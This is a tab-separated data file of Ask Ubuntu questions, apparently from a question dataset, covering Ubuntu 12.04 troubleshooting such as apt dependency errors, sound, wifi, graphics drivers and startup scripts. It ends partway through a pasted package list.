173895	when trying to upgrade kerberos development libraries , why do i get an `` unmet dependencies '' error ?	when i 'm upgrading , get this error and ca n't install anything else you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : krb5-multidev : depends : libkrb5-3 ( = 1.10+dfsg~beta1-2ubuntu0.2 ) but 1.10+dfsg~beta1-2ubuntu0.3 is installed depends : libk5crypto3 ( = 1.10+dfsg~beta1-2ubuntu0.2 ) but 1.10+dfsg~beta1-2ubuntu0.3 is installed depends : libgssapi-krb5-2 ( = 1.10+dfsg~beta1-2ubuntu0.2 ) but 1.10+dfsg~beta1-2ubuntu0.3 is installed depends : libgssrpc4 ( = 1.10+dfsg~beta1-2ubuntu0.2 ) but 1.10+dfsg~beta1-2ubuntu0.3 is installed depends : libkadm5srv-mit8 ( = 1.10+dfsg~beta1-2ubuntu0.2 ) but 1.10+dfsg~beta1-2ubuntu0.3 is installed depends : libkadm5clnt-mit8 ( = 1.10+dfsg~beta1-2ubuntu0.2 ) but 1.10+dfsg~beta1-2ubuntu0.3 is installed e : unmet dependencies . try using -f. i tried to run apt-get install -f but i still get the unmet dependencies error . this is the apt-cache policy output : ( i could n't post it to much hyper links so i pastebin it ) apt-cache policy output
173896	aspireone 722 , cant use external mic : mic receive sound from output !	i own an acer aspireone722 amd c-60 apu 2gb ram hd6290 conexant cx20588 sound card . i use ubuntu 12.04lts output is perfect : both speakers and headphones work fine . i have troubles with input : the internal mic was not enough powerful for skype calls so i tried to switch from `` internal mic '' to `` mic '' , realizing that the device called `` mic '' ( expected to be the 3.5mm mic port ) is actually a loopback device : it gets audio stream directly from my output ! ! example : i play a song with my mp3player and i use gnome-sound-recorder with `` mic '' . i obtain to record the song played ! ! ! i tried to change alsa drivers from linuxant without improvements . even alsamixer seems not to solve : i think that the problem is located at lower layers of abstraction .
173905	would a new mesa driver help to fix webgl problems ?	reading askubuntu and on the forums , i am trying to find out what to do about a webgl and google mapsgl problem ( described in a google forum thread starting at post # 5 ) . specifically , google 's mapsgl works perfectly in windows 7 ( on this same machine with dual-boot ) , but on ubuntu , the photo tour and 45 degree satellite view show grey blurry blobs ( see screen-shot ) . according to post # 10 , i may have better luck with an updated driver . i seem to have mesa 8.0.2 installed , and see from the mesa website that 8.0.3 is available . i have added ppa ppa : ubuntu-x-swat/x-updates , but the only two items it provides for update are xdiagnose and xserver-xorg-video-intel . these are n't the mesa drivers , are they ? so… would it help to update my mesa drivers ? if so , how would i go about it ? if not , what can i do to fix the problem ? i would be happy to try it out as long as i could roll back the changes should they fail . more information : ubuntu 12.04 64-bit fully updated . firefox 14.0.1 gives the error chromium 18.0 will not run mapsgl at all ( see post # 2 ) edit : chromium 20.0 does work if started as chromium-browser -- ignore-gpu-blacklist . the latest chromium is available from the ppa ppa : webapps/preview ( thank you , mikewhatever — see his answer below ) . edit : chromium has a setting that works the same way as -- ignore-gpu-blacklist . go to chrome : //flags and enable setting override software rendering list . thank you .
173907	when cloning ext4 partition with the `` dd '' command to a bigger partition free space does n't increase	recently i 've been trying to clone my hd using dd tool . everything was ok , as cloning ntfs partitions but when it comes to ext4 - dd does a strange thing . eg . having 12gb partition with 4gb of free space , when im trying to clone it on the new 25gb partition it does clone it , but the data that previously was 12gb , now are 21gb with 4gb ( the same amount of free space still as it was on the old partition ) . it happens everytime im cloning my home and root partitions ( ext4 ) . i was also trying to lower the size of the new partition , to the size of the old one , but then dd ends with error saying that there 's not enough of space , which should be enough ... anyone ? what 's going on ?
173909	error while trying to install ati/amd proprietary drivers ( post-release update )	i tried to install the proprietary driver which is available for my graphics card . there are 2 available drivers ; '' ati/amd proprietary fglrx graphics driver ( post-release updates ) '' and '' ati/amd proprietary fglrx graphics driver '' . as the updates most likely were to improve something , i chose post-release updates version . however , when i click `` activate '' , the installation fails after download . the following message is shown to me : sorry , the installation of this driver failed . please have a look at the log file for details /var/log/jockey.log full jockey.log is available here : http : //pastebin.com/hszajxeq is there any way i could get this `` post-release updates '' working ? or should i try installing the older version ? best regards , lassi
173913	strange network issue ; works on windows , but not on ubuntu , works on campus wireless , but not at home	i have a broadcom device using dell laptop that can dual boot into windows 7 and ubuntu 12.04 lts . i have no trouble connecting to the internet using the windows 7 side , but on ubuntu firefox and chrome both hang on loading on startup for a bit and then give me the `` webpage is not available '' page with this error and some suggestions at the end : the server at google.com ca n't be found , because the dns lookup failed . dns is the network service that translates a website's name to its internet access . i can however use terminal and ping 8.8.8.8 successfully . oddly enough , when i 'm on campus/ in my work building i can access the internet just fine through ubuntu and windows 7 . which leads me to believe it is some issue with my wireless router or my network configuration . i have a linksys wrt54gl . 1 other laptop and ipad that can successfully use wireless , a wired pc also connected to the router . my router setup uses dhcp with a cable modem . i have tried using these commands related to dns with no luck ; /etc/init.d/dns-clean restart /etc/init.d/networking force-reload sudo /etc/init.d/dns-clean also for some additional perspective ; i could use wireless just fine at home on the ubuntu side up until about 1-2 weeks ago when i started having this problem . i also use a vpn app to connect to my work 's network . i ca n't recall doing anything differently from the past 1-2 weeks . the only changes i can remember are running the usual updates that ubuntu prompts me with through update manager . any help would be much appreciated !
173914	how to know about a package as its a main package or dependecies to other package ?	i would like to know about package information as i have mentioned in my question . for example , there is a installed package in my system . so i want to know whether its a main package or dependency to some other package . thank you .
173920	i have a broken package that will not allow me to perform updates or any changes to my computer . how do i fix it ?	this is the error message i get - the following packages have unmet dependencies : skype-bin : i386 : depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : libqt4-dbus ( > = 4:4.5.3 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqt4-network ( > = 4:4.5.3 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqt4-xml ( > = 4:4.5.3 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqtcore4 ( > = 4:4.6.1 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqtgui4 ( > = 4:4.6.1 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libstdc++6 ( > = 4.4.0 ) but 4.6.3-1ubuntu5 is installed software center will not allow me to install or uninstall any programs , update manager will not update anything . i have tried from terminal to use 'apt-get ' commands but i hit road blocks there too ( as below ) for any command i enter . e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? where do i turn next ? how do i fix this ? note : i could care less if i have to get rid of skype , i rarely use it and have another computer it works on anyways .
173921	why does my thinkpad brightness control skip steps ?	the problem : there are 16 brightness levels on my laptop , but pressing hotkeys fn+home , fn+end adjusts brightness 3 steps at a time ( e.g . from 0 to 3 , or from 15 to 12 ) . i find it important to notice that at the login screen hotkeys work fine . but after login that odd behavior appears . also , if i give focus to a menu ( e.g . click on file menu in firefox ) , hotkeys work fine . xdotool key xf86monbrightnessdown works fine , adjusting brightness by 1 step ( checked with cat /sys/devices/pci0000:00/0000:00:02.0/backlight/acpi_video0/brightness ) . i also installed indicator-brightness - it shows 16 leves ( 0-15 ) . i tried setting acpi_backlight=vendor in grub ( inspired by this topic : http : //ubuntuforums.org/showthread.php ? t=1909184 with similar problem ) . it worked in that hotkeys became working fine . but problems with osd notification , xdotool and brightness indicator arised . so i think that it 's not a right solution . it seems that after login something interferes in the hotkeys processing scheme . any ideas ? edit ( additional info ) i made an observation that hotkeys work at hardware level - i can adjust brightness immediately after turning on my laptop ( e.g . at the bios screen ) . after $ killall gnome-settings-daemon hotkeys adjust brightness by one step , but no notifications appear . shortly gnome-settings-daemon recovers , and triple step issue returns . acpi_listen gives the following output ( both keys sequentially ) : $ acpi_listen ibm/hotkey hkey 00000080 00001010 video lcd0 00000086 00000000 ibm/hotkey hkey 00000080 00001011 video lcd0 00000087 00000000 at this point i thought that ( 1 ) hotkeys work at hardware level ; ( 2 ) ibm/hotkey takes care of hotkeys ; ( 3 ) video takes care too . thus , triple step issue appears . i tried blacklisting video ( i expected that this will lead to a double step behavior ) , but nothing changed . as a workaround , i created my own hotkeys in compizconfig settings manager - as described here , but with -- clearmodifiers argument : xdotool key -- clearmodifiers xf86monbrightnessup xdotool key -- clearmodifiers xf86monbrightnessdown so now i can either use initial hotkeys or new ones for finer adjustments . open questions there was already discussion for the case with double step : lenovo thinkpads , brightness function keys make two steps instead of one , looking for workaround : the hardware just does it and then also sends out a signal saying the button 's been pressed . possibly you could unset the shortcut in system - > preferences - > keyboard shortcuts for this action ? but i am eager to know , why do i get triple step issue ? how can i unset processing this hotkeys ? i would be very grateful if someone explains it .
173924	how to run a cron job using the sudo command	is it possible to run a cron job which needs the sudo command ? like : sudo rm somefile
173931	skype voice repetition	i use skype 4 with alsa . people tell me that they hear my voice twice ( voice and the echo of it ) . to make it clear , i do n't hear my voice from the speakers . it is skype which sends my voice twice to my interlocutor . how can i solve this problem ?
173937	have no internet connection over crosscable	i bought a crosscable and wanted to configure my server , like it 's said in the wiki . but when i connect , i do n't get wireless internet and the lan adapter says i am connected , but i have no internet and also ca n't access the server . i need help please .
173941	proper way to execute a script on system startup ?	as of ubuntu 12.04 , what is the proper/clean way to make the system execute a script upon boot ? ( not upon user login ) e.g . running a daemon .
173943	how to use amixer to change the volume in pulseaudio ?	i suspect that the volume of pulseaudio is off so i want to use amixer to turn it up from the command line . can i do this ? the amixer syntax is a bit confusing .
173947	why does openjdk automatically install when other version removed ?	every time i try to use openjdk java 7 , nothing happens . i try 6 , and still , no response . so , i tried removing it with ubuntu software center . every time i click on `` remove '' , it appears to remove it , but then the other version automatically downloads . for example , i remove openjdk java 6 , and java 7 ( with all the add-ons ) downloads onto my computer . i go to delete that , and once 7 is removed , version 6 reinstalls automatically , with all the add-ons . anyone know where i can stop the automatic downloads so i can re-install openjdk java , and get my programs to run again ?
173950	what is the quickest way to install oracle java6 or java7 on any ubuntu ?	there are tons of complicated answers on askubuntu on how to install any version of java . is there a quick and easy way to install the official oracle packages on ubuntu ?
173953	ubuntu 12.04lts will not install	i 'm trying to install ubuntu 12.04lts on an old machine that i fixed up . it boots from cd fine , it partitions the drive , and it gets about 25 % copying files , and then i get the error shown below : thinking it might be a bad cd , i tried burning another cd , but it does the same . the system had 11.10 on it prior , and it ran fine , up until this point . what can be the cause of this ? system specs : intel piii 1.0ghz 512gb ram 80gb hd onboard vga
173958	where do i put a .desktop file so the launcher can always show it ?	i recently installed e-sword on my 12.04 unity laptop . the installation creates a desktop icon of the application . i dragged the icon to the launcher and the icon was created in the launcher . but , when i move the desktop icon to trash , the launcher icon also disappears . what i need to do to delete the desktop icon without the launcher icon disappearing ?
173969	recover removed bluetooth sound device	i have a bluetooth headset and it used to show up in sound settings before i accidentally clicked `` turn off '' or something like that . now it wo n't show up when paired . no joy after reboot and re-pair . it pairs fine with my ubuntu as well as with my phone , only one is connected at a time . it seems like the `` turn off '' filtered this device in some alsa configs but grep returned nothing under /etc .
173972	how do i make my machine stop freezing during startup ?	during the initial startup when the dmesg is cascading down the screen , it stops at a certain line and waits forever . it used to stop at `` starting subsonic daemon , '' so i uninstalled subsonic . now it stops at the line before that . ( checking battery state ... [ ok ] ) how can i tell what is wrong ? i am able to start up in recovery mode and drop to 'netroot ' so i 'm able to do things that require the box be connected to the internet .
173976	is there any application on ubuntu equivalent to fedora 's 'connect to ' ?	on fedora 14 i use to use an app called 'connect to ' ( i think it was default app ) to make ssh connections . it was gui based ssh connection tool . now i have migrated to ubuntu ( 11.10 to be precise ) . i use terminal based openssh . openssh is pretty good but sometimes i wish it was gui app . i have tried a few but none do the job like 'connect to ' on fedora . is there any connect to equvalent on ubuntu ?
173978	is there a good text editor for vhdl ( ghdl ) ?	i would appreciate very much if someone could recommend me a good text editor for vhdl .
173981	installing tomcat 7 on ubuntu server 12.04	i 'm trying to install tomcat 7 on ubuntu server 12.04 with : sudo apt-get install tomcat7 which most sites and guides tell to do , but immediately i receive this answer : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation . the following packages have unmet dependencies : tomcat7 : depends : tomcat7-common ( > = 7.0.26-1ubuntu1.1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages what does this mean ? i 've tried updating the repositories , changing them of country , repairing broken-packages . i know there is the possibility of manual installation but this should be working easily any leads on this are greatly appreciated !
173992	how do i remove only one specific package with apt-get ?	i just installed mysql-server and all of its dependecies , anong other neccessities . but when it went to configure mysql-server it failed to do so , and spit out an error . which error is not relevant here as i managed to locate the problem as a drpendency issue between mysql-server and mysql-common . mysql-common needs to be removed . but when i go to apt-get purge remove mysql-common it automatically wants to remove everything in association with it as well , including all mysql dependencies , even apache2 and php5.. so what arguement needs to be added to apt-get command to uninstall only one package , yet leave all others intact . thanks for your time folks . take care .
173994	no sound on wolfenstien : et	i am trying to play wolfenstien et and everything works fine , except the sound ... i ca n't hear anything , does n't matter if it speakers or headphones.. anyone have any ideas ?
173997	how to give feedback to the ubuntu developers	i am pretty annoyed that i ca n't move the unity launcher in ubuntu 12.04 . i know there are alternatives as in using a different desktop , but i think users who do n't know how to install these , or do n't want to learn , or do n't want to fiddle with what should be a robust , user friendly interface out of the box , should have the option to move the launcher to their liking . i want to pass this feedback on to the developers . what is the best way for me to do this ?
173998	how do i run an i/o intensive application only when the computer is idle ?	is there a tool which can be instructed to pause specified processes if user uses a keyboard or mouse and to resume it in certain time after user has stopped interaction to the os ? i would like to treat such way annoying mlocate update db , backuppc .
173999	what fics chess clients are available ?	i have pychess but it seems to load the cpu excessively , even without the background evaluation tab . i used to use xboard but by now the ui feels somewhat outdated . i 'm looking for good fics integration rather than engines or analysis tools .
174001	how do i automate sending a file to an ftp server with a script ?	i need to take make a script that takes a particular log file in /var/log/ and puts it somewhere where i can easily get it ( most likely a web or ftp server i have access to ) . i do n't think i want to use mail to send it . webdav might be an option . it just needs to work without any user interaction , and be pretty fast and painless . any suggestions ? ( no password needed , basically )
174005	error accessing gio.gsettings on application made in quickly	i am trying to develop an application using the quickly/pygtk stack . i got my gsettings schemas all set up in ~/app-name-here/data/glib-2.0/schemas/net.launchpad.app-name-here.gschema.xml correctly and i am able to access it just fine in my preferences dialog window that is located in ~/app-name-here/app-name-here/preferencesdialog.py via from gi.repository import gtk , gio settings = gio.settings ( `` net.launchpad.app-name-here '' ) settings.get_boolean ( 'notify ' ) settings.set_boolean ( 'notify ' , true ) but when i try to check the value of one of my settings in a file located in ~/app-name-here/bin/daemon.py that i use as a script to run in the background and send notifications by a similar method of from gi.repository import gio settings = gio.settings ( `` net.launchpad.app-name-here '' ) settings.get_boolean ( 'notify ' ) it fails at the line that says settings = gio.settings ( `` net.launchpad.app-name-here '' ) and spits out a nasty error ( daemon.py:26100 ) : glib-gio-error ** : settings schema 'net.launchpad.app-name-here ' is not installed despite the fact that i can open up dconf-editor and find the settings under net/launchpad/app-name-here . any thoughts ?
174006	why does chrome report java as old , even though i have the newest version ?	i have the newest version of oracle java ( 1.7.0_05 ) from webupd8 's ppa . despite this , google chrome complaints that my java plug-in is out dated , and forces me to confirm that i want to run every applet i have to use ( like my bank and such ) . can anyone please tell me why this is ? did google screw up , or am i just in plain bad luck ? -- edit -- ( upon request ) i basically installed java this way : $ sudo add-apt-repository ppa : webupd8team/java $ sudo apt-get update $ sudo apt-get install oracle-java7-installer this works excellent for firefox , but chrome complains about the version . i have tried openjdk 7 , but it both reports being too old in chrome , and furthermore it wo n't load it at all .
174008	write bash script which takes input from pipe	i am always typing things like this : cat some_list_of_elements.txt | awk ' { print `` \047 '' $ 1 '' \047 '' } ' | paste -d , -s it takes a list of items from a file , wraps each in quotes , and merges them together in a comma-separated list . rather than typing out all that stuff , i 'd like to do something like this : cat some_list_of_elements.txt | csl how can csl be implemented in bash ? is there a way to do it as an alias ?
174016	crackling sound error	when i had windows 7 i had to limit the available ram to 3gb maximum or i 'd get crackling sound whenever a sound tried to play . something to do with the drivers for the creative x-fi sound card . now that i 've changed over to ubuntu the sound has started crackling again . might n't there be a way to limit the available ram like i had to on win7 ? or i have to buy a new sound card ?
174022	how do i disable shutter plugins ?	shutter is a nice software but it takes a while to load . i observed that initially it loads some plugins ( eg : upload-plugin ) . is there a way to disable these plugins so that shutter loads quickly ? please illustrate how to do this .
174026	how to run wallch in `` random time '' mode automatically on startup ?	i just discovered wallch and i installed it on my ubuntu 12.04 . i really like it . now , i would like to use the `` change wallpaper in random time ( 2-20 ) minutes '' option on startup . i enable the `` startup option '' in the preferences menu , to allow wallch runs every time i do login , and a wallch item is automatically added to my startup application preferences . looking at it , it runs the program with the option -- constant , instead of `` random '' . it does n't seem to exist any option on the command line to start the program in the `` random time '' mode . is there a way ?
174035	how to run xfce with no background	i 'm running xfce remotely via lightdb with xdcmp enabled . how do i disable the desktop background , ( preferably for remote sessions only ) ? note if i select menu- > settings- > desktop and select background image : none i still get a solid background . this is not good enough . remember x is a network protocol , i need to client the local desktop with remote applications over the top . when accessing remotely i only require the panel and the window-manager .
174036	how do i exit a terminal so that any processes i started keep running ?	i use firefox & as command in terminal . this must dissociate firefox from terminal . still when i close terminal , firefox exits . any ideas , why this happens ? how can i overcome this situation ?
174039	trick 64-bit ubuntu to allow 32-bit pci wireless card ?	i have an older 32-bit belkin f5d6001 ( aka admtek adm8211 802.11b wireless network card ) that i got to work in 32-bit ubuntu 12.04 via ndiswrapper ( windows wireless networking ) by using the cd it originally came with and ndiswrapper ( where it said hardware detected : yes ) . tried the same procedures in 64-bit 12.04 & even though it sees & communicates with the card , it will not connect to internet . it can see the networks around me but when i enter the 10-digit ( xxxxxxxxxx ) security key , it freezes the system . did hard reset by powering down & removing plug & power btn for several seconds & restarted but same thing occurs . spent countless hours researching on this & was wondering if there is a way to fool this 64-bit os to accept the driver . i have tried countless cmds ( iwconfig , ip addr , ndiswrapper related , etc. -- you name it , i 've tried it ) and even though it can detect it , it keeps freezing . i read that there is a default wireless card driver built-in to ubuntu that may conflict & must be removed in order to prevent the freezing but i 'm still a relative novice to linux & am unsure where this driver is located so i can remove it . even if i do find & remove it , i do n't think it will solve it because this step was not required in the 32-bit os which i stated above was successful . the chipset is adm8211 with pciid 1317:8201 . i 've tried several drivers i found via sourceforge that indicate it 's essentially the same chipset as realtek 8180 even though its pciid is different . could only find `` 8180l '' drivers on realtek 's website & placed them in ndiswrapper . tried them just in case along with ndiswrapper instructions listed here : http : //sourceforge.net/apps/mediawiki/ndiswrapper/index.php ? title=belkin_f5d6001 to change the pciid to match the 8180 's but to no avail even though was still able to see available networks . the only conclusions thus far i came to is : 1. that there is no way to make it connect to the web unless there is a way to fool the os into believing it is a 64-bit capable card or something like that or 2. the removal of aforementioned default ubuntu driver is definitely required with a 64-bit scenario like i am attempting . if anyone knows of a utility or method for this to occur , please feel free to help . thank you and blessings .
174040	how can i change the look of totems buttons , ( play , pause , etc )	i was wondering if it is possible to change the look of totems play pause buttons i really dislike the look of them they do n't really match up ... is there a config file i must edit to make them look as they did in 10.10 ?
174048	ubuntu 12.04 refuses to work with gtx 550 ti	ubuntu installation would not work with my gtx 550 ti , so i pulled it out and installed ubuntu just fine using my motherboards onboard graphics . but now i dont know how to get ubuntu to work with my 550 ti . i tried just plugging it back in with the pc on , but then the monitor will not display anything . i tried rebooting with the gfx card in but then ubuntu gets stuck on the purple screen . i have no idea what to do . please help me : (
174052	how to change qt ( kde ) application icons for gnome ?	i 'm running gnome3 on ubuntu 12.04 and my dolphin looks like this : i really do n't like these oxygen themed icons and want to use the faenza icons . i tried backing up the oxygen icons and downloading a version of faenza for kde and then making a sym link from faenza to oxygen like : sudo ln -s /usr/share/icons/faenza-kde /usr/share/icons/oxygen but nothing changed ? ? ! ? ! so where are qt apps pulling their icons from ? ! ? !
174057	how do i addusers with passwords and assign them to groups and make them administrators ?	what happened to the user and groups management gui applications that worked so well in 10.04 ? it looks like all of this has moved back to cli ? !
174059	how can i put gvim in my gnome-shell favorites ?	i use ubuntu 12.04 with gnome-shell and i would like to have gvim in the favorites bar . how can i put it there ? i ca n't find it under applications but it is installed .
174062	how do i get ubuntu working on a dell xps 15 ?	i have a dell xps 15 , ( l502x ) and i want to know if there is any problem , because of the 2 video cards , or anything else ? core i5 8 gb nvidia gt525m
174064	how do i extend my disk space with wubi ?	i install ubuntu 12.04 a couple of months ago . i use the maximum space allowed in ubuntu which is 30g to install ubuntu . because of ubuntu 's updates my disk is now on low space . i wish to add more.. maybe another 50g to make it 80g . ive seen some tutorial about wubi resize1.5b . but i dont know why it says this : skadush @ ubuntu : ~/downloads $ sudo bash wubi-resize_1.5b.sh 80 wubi-resize_1.5b.sh : the new disk can not exceed 32 gb unless the wubi-resize_1.5b.sh : -- max-override option is used ( not recommended ) . please help.. i realy want to extend may disk space on ubuntu.. thanks
174065	wifi not working on acer aspire one d270	brand new baby linux user here , never used ubuntu or any other linux os before , so be gentle and use short words ! i installed ubuntu 12.04 on my new acer aspire one d270-f61c/kf netbook ( it 's a japanese computer which had japanese windows preinstalled , and i decided to take the plunge and try ubuntu because english windows costs the earth and stars ) . wifi is n't working ; i enter my wireless password , it tries to connect for a while , then asks for my password again . and keeps asking , every few minutes . wired connection works fine . wireless card is a broadcom bcm4313 ; i have the `` additional drivers '' checked and installed ( i tried unchecking and then reinstalling them in case that would help , no joy , and now my home wifi connection is n't showing up in the list of available connections , argh ) . i 've done a lot of googling and i gather there 's a lot of issues with broadcom cards , but some of the answers are for earlier ubuntu builds and many of them are a bit confusing for a new user . i gather i need to try installing some new drivers other than the proprietary ones provided , but i 'm having trouble figuring out how that 's done . anyone got some simple , step by step instructions for me ? please bear in mind , total n00b . ( edit ) : okay , got it fixed finally ; after suggestions on the ubuntu forums and messing around with drivers , what finally worked was installing wicd . not ... using wicd , for some reason , just installing it fixed it . ... i choose not to question it .
174071	unity launcher remains visible while system is suspended	since an update i did a few days ago the unity launcher remains visible even after the computer goes into suspend . the screen goes fully black except for the task bar . it look 's clean , so i 'm thinking maybe it 's intended , but i 'm worried it will affect that part of my monitor , since i rarely shut the system down ?
174079	ca n't connect to the internet in ubuntu 12.04	i am new to ubuntu . i recently put together my own computer and i installed a wireless card in it , but i need to use a cd to install drivers so it is recognized . the problem is , ubuntu does n't seem to be able to run the cd . i appreciate any help i can get on this .
174080	12.04 suspend not working proper	okay i may have a strange issue . i can suspend my session and the computer will suspend as normal i.e i can press my power button and the computer will come back to my session . however , when i leave the computer for an extended amount of time it will not come out of being suspended . the computer will cold boot . i 've tried looking through similar questions and can not find this exact same issue .
174086	reinstalling ubuntu and purchased software via usc	anyone know what will happen if we freshly re-install ubuntu and our purchased software via usc . will it gone forever and need to purchase back or no need ? thanks ,
174089	after an upgrade , why is much more disk space used than apt-get 's estimate ?	i use apt-get to upgrade one package , and it shows : sam @ sam : ~/code/ros/pcl $ sudo apt-get upgrade ros-electric-perception-pcl reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : assimp-dev firefox firefox-globalmenu flashplugin-installer icedtea-netx icedtea-plugin icedtea6-plugin libeigen3-dev libopencv2.3 libopencv2.3-bin libopencv2.3-dev libpcl-all linux-generic linux-headers-generic linux-image-generic nautilus-dropbox openrave0.6-dp-base openrave0.6-dp-plugin-bulletrave openrave0.6-dp-plugin-dualmanipulation openrave0.6-dp-plugin-grasper openrave0.6-dp-plugin-ikfastsolvers openrave0.6-dp-plugin-oderave openrave0.6-dp-plugin-qtcoinrave openrave0.6-dp-plugin-textserver openrave0.6-dp-plugins-base openrave0.6-dp-python ros-electric-arbotix ros-electric-arm-navigation ros-electric-arm-navigation-experimental ros-electric-asctec-drivers ros-electric-assimp ros-electric-audio-common ros-electric-bond-core ros-electric-bosch-3rdparty ros-electric-bosch-common ros-electric-bosch-drivers ros-electric-bosch-image-proc ros-electric-bosch-manipulation-utils ros-electric-brown-drivers ros-electric-brown-perception ros-electric-brown-remotelab ros-electric-bullet ros-electric-camera-drivers ros-electric-camera-pose ros-electric-camera-umd ros-electric-care-o-bot ros-electric-care-o-bot-desktop ros-electric-care-o-bot-robot ros-electric-cart-pushing ros-electric-clearpath-common ros-electric-clearpath-husky ros-electric-clearpath-husky-robot ros-electric-clearpath-kinect ros-electric-clearpath-kingfisher ros-electric-clearpath-kingfisher-robot ros-electric-clearpath-turtlebot ros-electric-client-rosjava-jni ros-electric-cob-command-tools ros-electric-cob-common ros-electric-cob-driver ros-electric-cob-environment-perception ros-electric-cob-environments ros-electric-cob-extern ros-electric-cob-simulation ros-electric-common ros-electric-common-msgs ros-electric-common-rosdeps ros-electric-common-tutorials ros-electric-continuous-ops ros-electric-control ros-electric-cram-pl ros-electric-csiro-asl-utils ros-electric-desktop ros-electric-desktop-full ros-electric-diagnostics ros-electric-diagnostics-monitors ros-electric-documentation ros-electric-driver-common ros-electric-dynamixel-motor ros-electric-ecl-core ros-electric-ecl-lite ros-electric-ecl-manipulation ros-electric-ecl-navigation ros-electric-ecl-tools ros-electric-eigen ros-electric-erratic-robot ros-electric-ethzasl-aseba ros-electric-executive-smach ros-electric-executive-smach-visualization ros-electric-exploration ros-electric-filters ros-electric-flirtlib-features ros-electric-freiburg-tools ros-electric-geometry ros-electric-geometry-experimental ros-electric-geometry-tutorials ros-electric-geometry-visualization ros-electric-gps-umd ros-electric-humanoid-walk ros-electric-ias-common ros-electric-image-common ros-electric-image-pipeline ros-electric-image-transport-plugins ros-electric-imu-drivers ros-electric-industrial ros-electric-joystick-drivers ros-electric-joystick-drivers-tutorials ros-electric-knowrob ros-electric-laser-drivers ros-electric-laser-pipeline ros-electric-linux-networking ros-electric-map-manager-app ros-electric-map-store ros-electric-mav-tools ros-electric-mobile ros-electric-motion-analysis-mocap ros-electric-move-arm ros-electric-multimaster ros-electric-multimaster-experimental ros-electric-navigation ros-electric-netft ros-electric-nodelet-core ros-electric-nxt ros-electric-nxt-apps ros-electric-nxt-robots ros-electric-nxtall ros-electric-object-manipulation ros-electric-object-recognition ros-electric-occupancy-grid-utils ros-electric-octomap-mapping ros-electric-openni-kinect ros-electric-orocos-kinematics-dynamics ros-electric-orocos-toolchain ros-electric-p2os ros-electric-perception ros-electric-perception-pcl ros-electric-perception-pcl-addons ros-electric-physics-ode ros-electric-pluginlib ros-electric-point-cloud-perception ros-electric-pr2 ros-electric-pr2-applications ros-electric-pr2-apps ros-electric-pr2-arm-navigation ros-electric-pr2-arm-navigation-tests ros-electric-pr2-base ros-electric-pr2-calibration ros-electric-pr2-common ros-electric-pr2-common-actions ros-electric-pr2-controllers ros-electric-pr2-desktop ros-electric-pr2-dremel ros-electric-pr2-ethercat-drivers ros-electric-pr2-exploration ros-electric-pr2-gui ros-electric-pr2-kinematics ros-electric-pr2-make-a-map-app ros-electric-pr2-mannequin-mode-app ros-electric-pr2-map-navigation-app ros-electric-pr2-mechanism ros-electric-pr2-navigation ros-electric-pr2-navigation-apps ros-electric-pr2-object-manipulation ros-electric-pr2-pan-tilt ros-electric-pr2-plugs ros-electric-pr2-power-drivers ros-electric-pr2-props-app ros-electric-pr2-props-stack ros-electric-pr2-ps3-joystick-app ros-electric-pr2-robot ros-electric-pr2-self-test ros-electric-pr2-simulator ros-electric-pr2-tabletop-manipulation-apps ros-electric-pr2-teleop-app ros-electric-pr2-tuck-arms-app ros-electric-qt-ros ros-electric-remote-lab ros-electric-riq-hand ros-electric-robot ros-electric-robot-calibration ros-electric-robot-model ros-electric-robot-model-tutorials ros-electric-robot-model-visualization ros-electric-ros ros-electric-ros-applications ros-electric-ros-base ros-electric-ros-comm ros-electric-ros-full ros-electric-ros-realtime ros-electric-ros-release ros-electric-ros-tutorials ros-electric-rosh-desktop-plugins ros-electric-rosh-robot-plugins ros-electric-roshpit ros-electric-roslisp-common ros-electric-roslisp-support ros-electric-rosorg ros-electric-rosserial ros-electric-rtt-common-msgs ros-electric-rtt-geometry ros-electric-rtt-ros-comm ros-electric-rtt-ros-integration ros-electric-rx ros-electric-scan-tools ros-electric-schunk-modular-robotics ros-electric-shadow-robot ros-electric-shared-autonomy ros-electric-simple-arms ros-electric-simple-object-capture ros-electric-simulator-gazebo ros-electric-simulator-stage ros-electric-simulators ros-electric-slam-gmapping ros-electric-slam-karto ros-electric-sound-drivers ros-electric-sql-database ros-electric-stage ros-electric-tabletop-object-perception ros-electric-turtlebot ros-electric-turtlebot-apps ros-electric-turtlebot-arm ros-electric-turtlebot-desktop ros-electric-turtlebot-robot ros-electric-turtlebot-simulator ros-electric-turtlebot-simulator-desktop ros-electric-turtlebot-viz ros-electric-velodyne ros-electric-vision-opencv ros-electric-vision-visp ros-electric-visualization ros-electric-visualization-common ros-electric-visualization-experimental ros-electric-visualization-tutorials ros-electric-viz ros-electric-warehousewg ros-electric-web-interface ros-electric-wg-common ros-electric-wg-pr2 ros-electric-wg-pr2-apps ros-electric-wifi-drivers ros-electric-worldmodel ros-electric-xacro the following packages will be upgraded : app-install-data-partner apparmor apparmor-utils apport apport-gtk apt apt-transport-https apt-utils aptdaemon aptdaemon-data bind9-host bluez bluez-alsa bluez-cups bluez-gstreamer ca-certificates-java cvs dnsutils dpkg dpkg-dev ffmpeg firefox-gnome-support firefox-locale-en firefox-locale-zh-hant gdm-guest-session gir1.2-dbusmenu-glib-0.4 gnome-keyring gnome-power-manager gnome-user-guide grub-gfxpayload-lists gsettings-desktop-schemas gummi gvfs gvfs-backends gvfs-fuse icedtea-6-jre-cacao icedtea-6-jre-jamvm imagemagick initscripts insserv isc-dhcp-client isc-dhcp-common kdebase-runtime kdebase-runtime-data krb5-multidev language-pack-en language-pack-en-base language-pack-gnome-en language-pack-gnome-en-base libapparmor-perl libapparmor1 libavcodec-dev libavcodec52 libavdevice52 libavfilter1 libavformat-dev libavformat52 libavutil-dev libavutil50 libbind9-60 libbluetooth-dev libbluetooth3 libdbusmenu-glib3 libdbusmenu-gtk3 